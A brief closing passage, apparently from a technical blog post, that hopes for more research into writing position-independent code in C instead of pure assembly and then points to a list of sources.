I hope that, based on these sources, more research will be done into using C for writing PICs and that it proves more appealing than writing in pure assembly.

See sources here
